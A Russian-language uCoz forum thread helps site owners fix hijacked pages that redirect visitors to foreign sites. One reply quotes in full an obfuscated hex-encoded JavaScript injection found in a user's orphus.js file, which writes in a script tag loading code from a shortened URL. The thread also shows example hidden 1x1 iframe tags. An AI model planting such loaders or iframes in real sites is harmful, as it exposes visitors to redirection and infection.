Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz » Мастерская uCoz » Безопасность сайта » При заходе на сайт перекидывает на другой |
| При заходе на сайт перекидывает на другой |
 Описание проблемы: При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом  Причины возникновения: 1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки Если вы ставите к себе на сайт скрипт подобного вида Code <script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script> где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность 2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой Code <iframe src="http://levyisite.ru" width="1" height="1"></iframe> Где levyisite.ru - это адрес чужого сайта а Code width="1" height="1" Code width="0" height="0" Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов 3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность 4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес  Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем |
|
webanet, да в том и дело, что очень хочется чтоб быстрее яндекс хотя бы предупреждение о небезопасности сайта убрал ( Да и что тут еще можно подробнее написать?
Добавлено (07 Фев 2017, 05:16:56) --------------------------------------------- webanet, все таки взломали не 1 сайт. Я пришла к выводу, что взломали сайты с одним паролем. 1 подобрали и остальные сайты, к которым подошло. Еще на одном нашла скрипт, а вот тут не могу dlyapo*lnyx.ru. Соответственно ничего не трогала, помогите. Сообщение отредактировал Oksana5339 - Вторник, 07 Фев 2017, 05:55:21
|
|
Oksana5339,
Цитата dlyapo*lnyx.ru |
|
Oksana5339, вот этот скрипт заражен http://dlyapolnyx.ru/orphus.js
в файловом менеджере найдите файл с названием orphus.js откройте его на редактирование (разводной ключ или карандаш напротив файла) в самом низу удалите вредоносную вставку Цитата var _0xb4b0=["\x3C","\x73","\x63\x72","\x69\x70","\x74\x20\x74\x79","\x70\x65\x3D\x22\x74","\x65\x78\x74","\x2F","\x6A\x61","\x76\x61","\x73\x63","\x72\x69","\x70\x74\x22\x20\x73\x72","\x63\x3D\x22\x68","\x74\x74","\x70\x3A\x2F","\x2F\x67","\x6F","\x6F\x2E\x67","\x6C\x2F\x36\x67\x31\x4D\x55\x58\x22\x3E","\x3C\x2F","\x69","\x70","\x74","\x3E","\x77\x72\x69\x74\x65"];document[_0xb4b0[25]](_0xb4b0[0]+ _0xb4b0[1]+ _0xb4b0[2]+ _0xb4b0[3]+ _0xb4b0[4]+ _0xb4b0[5]+ _0xb4b0[6]+ _0xb4b0[7]+ _0xb4b0[8]+ _0xb4b0[9]+ _0xb4b0[10]+ _0xb4b0[11]+ _0xb4b0[12]+ _0xb4b0[13]+ _0xb4b0[14]+ _0xb4b0[15]+ _0xb4b0[16]+ _0xb4b0[17]+ _0xb4b0[18]+ _0xb4b0[19]+ _0xb4b0[20]+ _0xb4b0[1]+ _0xb4b0[2]+ _0xb4b0[21]+ _0xb4b0[22]+ _0xb4b0[23]+ _0xb4b0[24]); далее все сайты переведите на индивидуальный пароль в панели управления. панель управления - безопасность - изменить пароль аккаунта - переведите на отдельный пароль и каждому сайту задайте разные пароли. далее на каждом сайте удалите всех администраторов и модераторов и даже себя удалите из администраторов. отключите модуль пользователи для всех сайтов. в панели управления для каждого сайта создайте локальный профиль (для каждого сайта разные пароли) и будете входить на сайт через адрес вашсайт/admin САМОЕ ГЛАВНОЕ. НА ВСЕХ САЙТАХ СМЕНИТЬ ПАРОЛЬ К ФТП запоминать пароли к фтп не надо, поэтому поставьте самые сложные из возможных что-то типа fklgjfdjgdf9er8t93th5keigu далее будете смотреть. если после всех мероприятий появится снова. опять обязательно пишите |
|
Oksana5339, удалить и сохранить файл. после сбросить кеш. вы переходите пока по кешу
|
|
webanet, да, действительно. Спасибо вам огромное, что уделили так много времени. Думаю все таки что подобрали пароль к 1 из сайтов, еще к 2 был такой же, поэтому так все и произошло. На всех сайтах свой код внедряли по-разному, чтобы ушло время на поиск.
Почти все меры предосторожности, предложенные вами, применила Сообщение отредактировал Oksana5339 - Вторник, 07 Фев 2017, 14:17:48
|
|
Oksana5339, нет. не все. модуль пользователи вы не поотключали и админов не убрали. читайте внимательно
|
|
webanet, я добавила ограничение по IP вместо этого. У меня девочки авторы работают, я не могу пользователей отключить
Добавлено (10 Фев 2017, 16:33:20) Сообщение отредактировал Oksana5339 - Пятница, 10 Фев 2017, 01:48:49
|
|
Oksana5339, вам ответили в вебмастере или нет? по какому сайту идет предупреждение?
|
|
В мобильной версии сайта (с планшета или с мобильного) всплывает реклама при закрытии или просто подождать полной загрузки перекидует на левый сайт ( установка приложения али и тд ). Я так понял это реклама ваша, вот мне стало интересно это норма что после этого я не могу вернуться на сайт приходится наново водить адрес и ждать рекламы которую можно закрыть. Мой сайт http://my-phones.at.ua
|
|
tolya5827, ваш сайт доступен по адресу cermare.at.ua. Сайт lan.langate.ua, судя по вашему IP, является сайтом вашего провайдера. Если перенаправление остается, обратитесь к провайдеру для решения данного вопроса.
|
|
Всем доброго времени суток!
Вот и до меня добралась подобная проблема, вместо моего сайта http://white-wolf.tk/ открывается http://www.freenom.link/de/index.html?lang=de Сам бы может поискал где проблема, но на сайт попасть никак не могу, перекидывает и всё  Получается заходить только с телефона, но на нём в ручную проверять весь код это не реально... За ранее благодарю за оказанную помощь! Добавлено (08 Окт 2017, 15:27:05) Сообщение отредактировал _White_Wolf_ - Воскресенье, 08 Окт 2017, 11:22:46
|
|
_White_Wolf_, проблема в вашем бесплатном домене. уберите ссылки из меню ведущие на ваш бесплатный домен. сбросьте кеш в браузере и входите на сайт по старому адресу http://white-wolf.my1.ru/ и у вас все будет работать. и больше не связывайтесь с доменами tk так как их стали отключать
|
| |||